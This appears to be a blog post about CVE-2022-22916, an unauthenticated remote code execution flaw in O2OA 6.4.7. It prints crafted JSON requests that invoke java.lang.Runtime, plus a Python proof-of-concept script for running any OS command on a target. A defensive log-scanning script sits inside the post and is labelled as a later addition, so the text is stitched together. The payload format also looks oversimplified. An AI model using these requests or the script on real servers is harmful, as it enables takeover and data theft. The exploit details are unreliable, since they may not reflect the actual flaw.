In the world of enterprise collaboration software, O2OA is a popular, open-source platform widely used for business process management in China. However, it sometimes finds itself in the spotlight for the wrong reasons. In 2022, security researchers uncovered a serious vulnerability affecting O2OA version 6.4.7, tracked as CVE-2022-22916. This bug allows attackers to remotely execute arbitrary code on the server and potentially gain full control, simply by sending a crafted request to the /x_program_center/jaxrs/invoke endpoint.

In this article, we'll break down CVE-2022-22916 in simple terms, show how the attack works, demonstrate exploiting the vulnerability, and discuss the risk and remediation.

What is O2OA?

O2OA (Official site: https://www.o2oa.net/) is an open-source platform for workflow, document management, and office automation. It's Java-based and used by many small and large organizations.

Impact: Remote attackers can execute arbitrary commands on the server.

This means that without authentication, an attacker can send an HTTP request and run system commands, install malware, steal data, or cause other damage.

How Does the Vulnerability Work?

The bug lies in the /x_program_center/jaxrs/invoke API endpoint. This endpoint is meant for administrative or system-level function calls but doesn't properly validate or sanitize user inputs.

Attackers can send a crafted JSON payload to this endpoint. The vulnerable code will parse and invoke whatever method is specified, including system commands.

Assume the service is running on http://victim.com:8888. The vulnerable endpoint is reached with a request of the following form:

POST /x_program_center/jaxrs/invoke HTTP/1.1
Host: victim.com:8888
Content-Type: application/json
Content-Length: xxx

{ ...payload... }

A malicious request aiming to run system commands might look like this:

POST /x_program_center/jaxrs/invoke HTTP/1.1
Host: victim.com:8888
Content-Type: application/json

{
    "name": "java.lang.Runtime",
    "method": "getRuntime",
    "parameterTypes": [],
    "parameters": []
}

The above returns a Runtime object, giving the attacker a handle to execute commands. The attacker can then execute arbitrary OS commands like whoami or even download malware:

POST /x_program_center/jaxrs/invoke HTTP/1.1
Host: victim.com:8888
Content-Type: application/json

{
    "name": "java.lang.Runtime",
    "method": "getRuntime().exec",
    "parameterTypes": ["java.lang.String"],
    "parameters": ["whoami"]
}

If successful, the server will actually run the command and reply with the output.

Proof of Concept (PoC) Exploit

Below is a Python script that demonstrates the exploit. Make sure you have Python and the requests library installed.

import requests
import json

target_url = "http://victim.com:8888/x_program_center/jaxrs/invoke"

payload = {
    "name": "java.lang.Runtime",
    "method": "getRuntime().exec",
    "parameterTypes": ["java.lang.String"],
    "parameters": ["whoami"]  # Replace with your command
}

headers = {
    "Content-Type": "application/json"
}

r = requests.post(target_url, headers=headers, data=json.dumps(payload))
print(r.text)

You can replace the parameters entry with any OS command you like.


Mitigation and Fix

Upgrade Immediately
The O2OA developers released patched versions after the disclosure. If you're running 6.4.7 or below, upgrade to the latest version as soon as possible.
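Until the upgrade is done, the request shape shown above is easy to spot at a reverse proxy or WAF that captures request bodies. The following Python script is an added example (not O2OA's code and not from the original post): it scans constructed proxy log lines and flags POSTs to /x_program_center/jaxrs/invoke that reference JVM classes or chain calls in the method field. The tab-separated log layout, the com.example.app. package prefix and the sample lines are assumptions.

```python
import json

INVOKE_PATH = "/x_program_center/jaxrs/invoke"
# The JVM class the page's payloads go through; anything under java.* is treated the same.
DANGEROUS_CLASSES = {"java.lang.Runtime"}
# Package prefixes legitimate callers are expected to use (assumed; tune per deployment).
ALLOWED_PREFIXES = ("com.example.app.",)


def classify_invoke(body):
    """Return the reasons an invoke body looks malicious (empty list means benign)."""
    try:
        data = json.loads(body)
    except (ValueError, TypeError):
        return ["body is not valid JSON"]
    if not isinstance(data, dict):
        return ["body is not a JSON object"]
    name = str(data.get("name", ""))
    method = str(data.get("method", ""))
    reasons = []
    if name in DANGEROUS_CLASSES or name.startswith("java."):
        reasons.append("JVM class referenced: " + name)
    elif not name.startswith(ALLOWED_PREFIXES):
        reasons.append("class outside allowed packages: " + name)
    # A legitimate method field is a bare identifier; '.' or '(' means a chained call.
    if "." in method or "(" in method:
        reasons.append("chained call in method field: " + method)
    return reasons


def scan_log(lines):
    """Return [(line_no, client_ip, reasons)] for flagged POSTs to the invoke endpoint."""
    hits = []
    for n, line in enumerate(lines, 1):
        # Assumed proxy log layout: client_ip, HTTP method, path, request body (tab-separated).
        parts = line.rstrip("\n").split("\t", 3)
        if len(parts) < 4 or parts[1] != "POST" or parts[2] != INVOKE_PATH:
            continue
        reasons = classify_invoke(parts[3])
        if reasons:
            hits.append((n, parts[0], reasons))
    return hits


# Constructed sample log lines; the first and last reuse the request bodies shown above.
SAMPLE_LOG = [
    '10.0.0.5\tPOST\t/x_program_center/jaxrs/invoke\t{"name": "java.lang.Runtime", "method": "getRuntime().exec", "parameterTypes": ["java.lang.String"], "parameters": ["whoami"]}',
    '10.0.0.7\tPOST\t/x_program_center/jaxrs/invoke\t{"name": "com.example.app.Report", "method": "list", "parameterTypes": [], "parameters": []}',
    '10.0.0.9\tGET\t/index.html\t',
    '10.0.0.5\tPOST\t/x_program_center/jaxrs/invoke\t{"name": "java.lang.Runtime", "method": "getRuntime", "parameterTypes": [], "parameters": []}',
]
```

Running scan_log(SAMPLE_LOG) flags lines 1 and 4 (both from 10.0.0.5) and leaves the legitimate application call on line 2 alone; a hit is a strong signal to isolate the host and review it for compromise, since the endpoint needs no authentication.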

Conclusion

CVE-2022-22916 is a critical RCE bug that threatens any unpatched O2OA server. It's an example of how dangerous unsanitized method invocations can be in Java-based web services. If you use O2OA, update immediately and check your systems for possible compromise.

Security is a moving target—stay updated, stay safe!

*For security researchers: Always get proper authorization before testing systems that aren't yours.*

Timeline

Published on: 02/17/2022 22:15:00 UTC
Last modified on: 02/25/2022 17:50:00 UTC